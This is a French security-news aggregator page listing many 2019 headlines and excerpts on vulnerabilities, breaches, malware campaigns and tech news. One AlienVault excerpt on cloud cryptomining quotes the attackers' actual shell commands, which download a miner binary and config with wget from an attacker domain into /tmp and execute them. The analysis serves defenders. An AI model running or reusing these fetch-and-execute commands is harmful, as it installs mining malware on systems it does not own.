What's new arround internet

Src Date (GMT) Titre Description Tags Stories Notes
SecurityWeek.png 2019-03-14 16:41:05 Code Execution Flaw Found in Sonatype Nexus Repository Manager (lien direct)

A critical remote code execution vulnerability has been found and patched in Sonatype\'s Nexus Repository Manager (NXRM), a popular open-source tool that allows developers to manage software components.

read more

securityintelligence.png 2019-03-14 16:25:01 Breaking Down the Incident Notification Requirements in the EU\'s NIS Directive (lien direct)

Similar to the GDPR, you can approach the NIS Directive as a roadblock or a nuisance, or you can consider it an excellent opportunity to improve your security posture.

The post Breaking Down the Incident Notification Requirements in the EU’s NIS Directive appeared first on Security Intelligence.

TechRepublic.png 2019-03-14 16:19:00 Vivaldi Vs. Firefox: A users\' perspective (lien direct)

What does Vivaldi need to usurp Firefox as the default browser for one particular user? Find out below.

MalwarebytesLabs.png 2019-03-14 16:15:05 Reputation management in the age of cyberattacks against businesses (lien direct) A business\'s reputation takes years to build. With the current climate of data breaches, unsurprisingly, destroying it could only take seconds. What can businesses do to protect their brands from a fallout following a cybersecurity incident? In this post, we answer these questions and more.

Categories:

101 Business FYI

Tags:

(Read more...)

The post Reputation management in the age of cyberattacks against businesses appeared first on Malwarebytes Labs.

Kaspersky.png 2019-03-14 15:56:00 Cisco Patches Critical \'Default Password\' Bug (lien direct)

Vulnerability allows adversaries to access monitoring system used for gathering info on operating systems and hardware.

TechRepublic.png 2019-03-14 15:53:02 7 tech capabilities your business needs to hit digital transformation success (lien direct)

Data mastery is among the factors vital for companies seeking successful digital transformations, according to a Deloitte report.

Kaspersky.png 2019-03-14 15:33:03 GlitchPOS Malware Appears to Steal Credit-Card Numbers (lien direct)

A new malware targeting point of sale systems, GlitchPOS, has been spotted on a crimeware forum.

WiredThreatLevel.png 2019-03-14 15:20:04 Fitbit Versa Lite Review: More for Less (lien direct)

This pared-down smartwatch still has just about everything you need.

grahamcluley.png 2019-03-14 15:19:02 Online training site says it is spamming insecure printers with adverts (lien direct)
Online training site says it is spamming insecure printers with adverts

Online training site Skillbox says that it has come up with an imaginative way to reach out to potential clients, and invite them to change their careers from being accountants and become graphical designers instead.

The Russian firm\'s idea? To send a spam message to thousands of printers left open to the internet.

Is this really happening again?

TechRepublic.png 2019-03-14 15:04:02 How to install the Ajenti Control Panel on Ubuntu 18.04 (lien direct)

Make your data center servers easier to manage, without spending a penny on software with the Ajenti server manager.

TechRepublic.png 2019-03-14 15:04:00 How to choose recruiting and hiring software and services (lien direct)

Finding, recruiting, and hiring topnotch talent is key to your company\'s success. These guidelines will help you assess potential vendors and services that can lend a hand.

SecurityWeek.png 2019-03-14 15:00:04 U.S. Senators Want Transparency on Senate Cyberattacks (lien direct)

U.S. Senators Ron Wyden and Tom Cotton believe all senators should receive information on successful cyberattacks aimed at the Senate.

read more

bleepingcomputer.png 2019-03-14 15:00:02 Students Hack School System to Change Grades and Attendance (lien direct)

Like a modern day WarGames, students in Michigan have hacked into a school district\'s computer system and changed grades and attendance records. [...]

no_ico.png 2019-03-14 15:00:01 The Biometric Smart Card: Connecting The Digitally Excluded (lien direct)

Digital inclusion is the ability of individuals to access and use information and communication technologies (ICT). Even in today\'s hyper-connected and technologically advanced world, there are still those who struggle to access basic IT and are being excluded as a result. In fact, according to recent research, 11.5m people in the UK lack the basic …

The ISBuzz Post: This Post The Biometric Smart Card: Connecting The Digitally Excluded appeared first on Information Security Buzz.

MalwarebytesLabs.png 2019-03-14 15:00:00 Emotet revisited: pervasive threat still a danger to businesses (lien direct) Emotet is often mentioned as one of the most annoying, effective, and costly present-day malware infections. We discuss the reasons why and the proper way to remove it.

Categories:

Cybercrime Malware

Tags:

(Read more...)

The post Emotet revisited: pervasive threat still a danger to businesses appeared first on Malwarebytes Labs.

WiredThreatLevel.png 2019-03-14 15:00:00 Marvel\'s \'Shang-Chi\' Movie Just Got a Director (lien direct)

He\'s a big talent, not a big name.

AlienVault.png 2019-03-14 14:55:00 Making it Rain - Cryptocurrency Mining Attacks in the Cloud (lien direct)

By Chris Doman and Tom Hegel

Organizations of all sizes have made considerable shifts to using cloud-based infrastructure for their day-to-day business operations. However, cloud security hasn't always kept up with cloud adoption, and that leaves security gaps that hackers are more than happy to take advantage of.

One of the most widely observed objectives of attacking an organization's cloud infrastructure has been for cryptocurrency mining. Despite recent falls in cryptocurrency prices, mining campaigns continue to plague organizations. Below, we've shared some of the more noteworthy forms of attack where the hackers’ end objective is to use your cloud infrastructure to mine cryptocurrency.

Compromised Container Management Platforms

We've seen attackers using open APIs and unauthenticated management interfaces to compromise container management platforms.

We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request.

RedLock reported the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes to victim organizations. For example, customer data and business operations could be at risk for theft or malicious modification.

Following the attention of the report by RedLock, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves.

Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns.

Control Panel Exploitation

We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code.

In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP.  This was followed by frantic posts on the official VestaCP forums and those of web-hosts that run VestaCP.  VestaCP users provided details on how their installations were compromised.

In these attacks, they added a new backdoor user called “sysroot,” and then downloaded and installed the XMRig application to mine Monero cryptocurrency.

pkill -f xmrig;

wget -O /tmp/gcc http://xaxaxa[.]eu/gcc;

chmod +x gcc;

wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json;

/tmp/gcc -c /tmp/config_1.json;

Lastly, the

Blog.png 2019-03-14 14:40:05 HackInOS:1: Vulnhub Lab Walkthrough (lien direct)

Hello friends! Today we are going to take another boot2root challenge known as “HackInOS: 1”. The credit for making this VM machine goes to “Fatih Çelik” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here. Security Level: Intermediate Penetrating... Continue reading

The post HackInOS:1: Vulnhub Lab Walkthrough appeared first on Hacking Articles.

bleepingcomputer.png 2019-03-14 14:39:03 Intel Fixes High Severity Vulnerabilities in Graphics Driver for Windows (lien direct)

Intel fixed 20 security vulnerabilities in the Intel Graphics Driver for Windows which would lead to escalation of privilege, denial of service, or information disclosure if exploited by attackers with local access to the system under attack. [...]

SecurityAffairs.png 2019-03-14 14:38:00 Cisco addresses a critical static credential flaw in Common Services Platform Collector (lien direct)

Cisco released security updates to address a critical vulnerability in its Cisco Common Services Platform Collector (CSPC) software. Cisco released security updates to address a critical flaw, tracked as CVE-2019-1723, that consists in the presence of a default account with a static password. The account hasn’t admin privileges, but it could be exploited by an […]

The post Cisco addresses a critical static credential flaw in Common Services Platform Collector appeared first on Security Affairs.

WiredThreatLevel.png 2019-03-14 14:34:00 New \'Avengers: Endgame\' Trailer Does \'Whatever It Takes\' (lien direct)

Hawkeye\'s got a mohawk, the team\'s got shiny new suits, and that\'s about all you\'ll get out of the latest \'Avengers: Endgame\' trailer.

no_ico.png 2019-03-14 14:30:02 Suspected DDoS Attack Takes Down Social Media Giants (lien direct)

A suspected DDoS attack has taken down the world’s largest social media companies. Facebook, Instagram, WhatsApp and more are all suffering for problems that are stopping people getting online through websites and apps.It is not clear if the outages are connected. But they all mysteriously began at the same time, and are being felt across the world.  Tim Helming, Director …

The ISBuzz Post: This Post Suspected DDoS Attack Takes Down Social Media Giants appeared first on Information Security Buzz.

no_ico.png 2019-03-14 14:28:02 Happy Pi Day! (lien direct)

There’s only a few times to use a pie chart, but to help you celebrate, there’s how to keep track of your intake:

The_State_of_Security.png 2019-03-14 14:25:02 Attackers Sending Out Fake CDC Flu Warnings to Distribute GandCrab (lien direct)

Digital attackers are sending out fake flu warnings that appear to come from the U.S. Center for Disease Control (CDC) in order to distribute GandCrab ransomware. An attack begins when a user receives a fake CDC email. The sender field claims that the email came from “Centers for Disease Control and Prevention.” But a closer […]… Read More

The post Attackers Sending Out Fake CDC Flu Warnings to Distribute GandCrab appeared first on The State of Security.

TechRepublic.png 2019-03-14 13:58:02 Cryptocurrency mining attacks still major security risk, despite closure of Coinhive (lien direct)

Cryptojacking attacks can be executed in more ways than JavaScript files in browsers, and cryptocurrency mining is moving to cloud services, according to AT&T Cybersecurity.

SecurityWeek.png 2019-03-14 13:50:02 US Warns of Sophisticated Cyberattacks From Russia, China (lien direct)

Cyberattacks from Russia, China, North Korea and Iran are increasingly sophisticated and, until recently, were done with little concern for the consequences, the top Pentagon cyber leaders told a congressional committee on Wednesday.

read more

TechRepublic.png 2019-03-14 13:49:02 Why machine learning engineer is the best job in America, not developer or data scientist (lien direct)

While data scientists and developers may have more job openings, machine learning jobs have higher salaries and faster growth, according to Indeed.

no_ico.png 2019-03-14 13:30:03 F5 Discovers “CryptoSink” Monero-Mining Campaign (lien direct)

Researchers at F5 Labs, the threat intelligence arm of F5 Networks, have uncovered a new malware campaign dubbed “CryptoSink” used deploy an XRM (Monero) mining operation targeting Elastisearch systems.    Key features include:  The campaign exploits a five-year-old vulnerability (CVE-2014-3120) in Elasticsearch systems running on Windows and Linux  On Linux, it delivers several previously unknown malwares which weren\'t detected …

The ISBuzz Post: This Post F5 Discovers “CryptoSink” Monero-Mining Campaign appeared first on Information Security Buzz.

TechRepublic.png 2019-03-14 13:26:00 Businesses don\'t get how AI cybersecurity tools work, but plan to use them anyway (lien direct)

Some 71% of businesses plan to use AI and machine learning in their security tools this year, though over half aren\'t sure what that tech really does, according to Webroot.

bleepingcomputer.png 2019-03-14 13:19:01 Unsecured Database Exposed 33 Million Job Profiles in China (lien direct)

An unsecured database containing the resumes and personal information of approximately 33 million people seeking jobs in China has been exposed online. [...]

SecurityWeek.png 2019-03-14 13:14:02 Default Account in Cisco CSPC Allows Unauthorized Access (lien direct)

Cisco on Wednesday informed customers that updates released for its Cisco Common Services Platform Collector (CSPC) software address a critical vulnerability.

read more

globalsecuritymag.png 2019-03-14 13:09:02 Une étude Proofpoint révèle une augmentation de 65% des attaques d\'applications cloud au 1er trimestre 2019 ; 40% des attaques provenant du Nigeria (lien direct)

Proofpoint, Inc. publie les résultats de sa recherche sur les attaques d\'applications Cloud (" Cloud Application Attack ") pour le 1er trimestre 2019, qui examine plus de 100 000 attaques visant les entreprises mondiales entre Septembre 2018 et Février 2019. Dans l\'ensemble, les tentatives d\'attaques ont augmenté de 65 % au cours de cette période, dont 40 % provenant du Nigeria. La Chine est le deuxième pays d\'origine par ordre d\'importance, avec 26 % des attaques provenant d\'adresses IP chinoises. (...) - Investigations

AlienVault.png 2019-03-14 13:00:00 AT&T Cybersecurity partner of the year 2018 (lien direct)

I am very excited to announce the 2018 AT&T Cybersecurity (formerly AlienVault) Partners of the Year! These eight outstanding companies achieved phenomenal business growth during 2018 and truly reflect the types of organizations that believe in ‘customers first’.

The AT&T Cybersecurity Partner Program enables leading VARs, system integrators, managed security service providers (MSSPs), managed detection and response providers (MDRs) and corporate resellers to sell and support AT&T Cybersecurity solutions and deliver compelling services powered by AlienVault USM in the global marketplace. With a strong focus on enablement, the program is designed to help solution providers create new opportunities for business growth, expansion and profitability.

Our dynamic and rapidly expanding partner community is a critical part of our success as a company, and we are committed to enabling and supporting the growth of our participants based on their individual goals and objectives.

Our Partner of the Year awards recognize the success achieved by our partners in the following categories:

Global awards:

Global Partner of the Year:  BINARY DEFENSE

  • Highest overall sales bookings in 2018

Binary Defense led the AT&T Cybersecurity global partner community by identifying, architecting and delivering managed security services to a record number of customers. These customers ran the spectrum in size, from small business to some very recognizable, household names! They had top honors two years ago and we are very proud to recognize their return to the top spot by delivering more than 100% year-over-year growth.

“We are honored to receive such an award. The continued partnership and support between AlienVault and Binary Defense is a testament to the dedication of both organizations to improving cyber security around the world. As a leading MSSP and provider of SOC-as-a-Service, Binary Defense is proud to be aligned with AlienVault’s world class SIEM platform.”  - Mike Valentine, CEO

Growth Partner of the Year:  IT LAB

  • Highest growth in 2018 as compared to 2017 sales bookings

IT Lab, based in the UK, delivered more than 800% growth year-over-year leading all others in 2018 by a comfortable margin. These growth numbers are challenging to achieve even in the best of times and IT Lab were able to take a great baseline and deliver these amazing results. With an eye firmly on value, it’s no surprise their existing customers renew and new customers flock to their services.

IT Lab are thrilled to have been awarded growth partner of the year. This represents the excellent growth that we have had across IT Lab, both within our cyber security services and beyond. The SOC team have on-boarded some excellent clients in the last 12 months; spanning large FTSE250 businesses to financial and professional services, healthcare organisations and beyond. This award is testament to the fantastic team, and the great people that make up that team, right across our cyber and managed services.” – Michael Bateman

New Partner of the Year:  AGIO

  • Highest sales bookings by a solution provider that joined our program in 2018

Agio signed on with us in early 2018 and came to the table with focused goals, a compelling service offering and an amazing technical team. Their desire to be impactful to their customers immediately made recognizing Agio a simple process. When you

WiredThreatLevel.png 2019-03-14 13:00:00 Freitag\'s Latest Bags Have a Funky New Ingredient: Plastic (lien direct)

The Swiss company Freitag, famous for using upcycled truck tarps, has a new line of bags partially made of yarn spun from plastic bottles.

grahamcluley.png 2019-03-14 12:40:05 US Senators say it shouldn\'t be a secret when they\'ve been hacked (lien direct)
US Senators say it shouldn't be a secret when they've been hacked

Federal agencies and companies are required by law to disclose breaches, but Congress is under no such obligation - meaning that the public may have no idea that their political representatives have been hit.

Read more in my article on the Tripwire State of Security blog.

TechRepublic.png 2019-03-14 12:38:00 What California\'s move to collect back taxes from Amazon Fulfillment users means for your business (lien direct)

Tax authorities in California are pursuing "up to eight years" of back taxes from merchants using Amazon Fulfillment services, claiming that constitutes physical presence.

bleepingcomputer.png 2019-03-14 12:32:03 Multi-Factor Auth Bypassed in Office 365 and G Suite IMAP Attacks (lien direct)

Massive IMAP-based password-spraying attacks successfully breached Microsoft Office 365 and G Suite accounts protected with multi-factor authentication (MFA) according to an analysis by Proofpoint. [...]

DarkReading.png 2019-03-14 12:30:00 US Prosecutors Investigate Facebook\'s Data-Sharing Deals (lien direct)

The news follows a long, tumultuous period of scandal around Facebook and its privacy practices.

Kaspersky.png 2019-03-14 12:27:00 Insider Threats Get Mean, Nasty and Very Personal (lien direct)

Increasingly, attackers are targeting the most vulnerable people inside companies and exploiting their weaknesses.

Blog.png 2019-03-14 12:23:03 Whack-a-Fraud: EU\'s Crackdown Could Increase U.S. Payments Scams (lien direct)

U.S. providers should be "on alert" for an increase in payments fraud experts warn. The European Union\'s (EU\'s) new Payment Services Directive (PSD2) raises the bar for security and may cause cybercriminals to focus on targets in this country.

The post Whack-a-Fraud: EU’s Crackdown Could Increase U.S. Payments Scams appeared first on ...

Read the whole entry...  _!fbztxtlnk!_ https://feeds.feedblitz.com/~/599552010/0/thesecurityledger -->»

TechRepublic.png 2019-03-14 12:18:00 How to add a home screen shortcut to a Gmail label (lien direct)

Make your mobile life even easier by creating a home screen shortcut for Gmail labels.

WiredThreatLevel.png 2019-03-14 12:00:00 The Disinformation Problem Starts at Home (lien direct)

Opinion: When it comes to false and divisive online content, more is produced domestically than abroad-and the platforms need to do more to address it.

WiredThreatLevel.png 2019-03-14 12:00:00 DNA Crime-Solving Is Still New, Yet It May Have Gone Too Far (lien direct)

Genetic databases are helping to solve cold crimes. But the arrest of a woman decades after she killed her baby raises questions of police overreach.

WiredThreatLevel.png 2019-03-14 12:00:00 Kamala Harris Wants to Give States Millions to Overhaul Tech (lien direct)

The Digital Service Act of 2019 would help state and local governments hire the talent they need to fix the often outdated tools and websites Americans use every day.

ZDNet.png 2019-03-14 11:51:04 Proof-of-concept code published for Windows 7 zero-day (lien direct)

More details emerge about the two Windows zero-days that Microsoft patched this Tuesday.

bleepingcomputer.png 2019-03-14 11:32:05 Malicious Javascript Active on FILA UK and Other Websites (lien direct)

Payment card data of thousands of online shoppers has been stolen at checkout via malicious JavaScript code cybercriminals embedded in seven websites and which continues to collect and deliver the information the crooks. [...]

SecurityAffairs.png 2019-03-14 11:31:01 CSRF flaw in WordPress potentially allowed the hack of websites (lien direct)

Security researcher Simon Scannell from RIPS Technologies, has discovered a new CSRF vulnerability in WordPress, that could potentially lead to remote code execution attacks. The flaw is a cross-site request forgery (CSRF) that resides in the comment section of WordPress that is enabled by default, the issue affects all WordPress versions prior to version 5.1.1. […]

The post CSRF flaw in WordPress potentially allowed the hack of websites appeared first on Security Affairs.

itsecurityguru.png 2019-03-14 11:04:03 Over 6,000 patients in Massachusetts notified of data breach. (lien direct)

Concord, Mass.-based Emerson Hospital sent letters to 6,314 patients alerting them of a May2018 cybersecurity attack that may have affected their information, according to the HIPAA Journal. The security incident, which happened between May 9-17, was the result of a former MiraMed Global Services, a company that helps hospitals collect payments, who sent patient files to […]

The post Over 6,000 patients in Massachusetts notified of data breach. appeared first on IT Security Guru.

itsecurityguru.png 2019-03-14 11:01:02 Outdoor retailer Kathmandu hit by data breach. (lien direct)

Kathmandu, an outdoor wear and equipment retailer, revealed that it suffered a data breach that disclosed its customers\' credit card and personal information. The New Zealand-based company stated that unknown intruders allegedly gained access to its online trading website for over a month between January 8, 2019, and February 12, 2019. Kathmandu stated the hackers […]

The post Outdoor retailer Kathmandu hit by data breach. appeared first on IT Security Guru.

itsecurityguru.png 2019-03-14 11:01:01 Australian man arrested after selling account details for Netflix, Hulu and Spotify. (lien direct)

A Sydney man has been arrested after allegedly selling hundreds of thousands of compromised account details for subscription streaming services, including for Netflix, Hulu and music streaming service Spotify – raking in about $212,000 ($300,000 AUD) in profit in the process. The Australian Federal Police (AFP) were tipped off to the 21-year-old malefactor\'s alleged activities […]

The post Australian man arrested after selling account details for Netflix, Hulu and Spotify. appeared first on IT Security Guru.

5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

Information mise à jours le: 2019-03-26 04:01:32
Voir la liste des sources.

Mon email:

Vous souhaitez ne rien manquer: Notre RSS (filtré) Twitter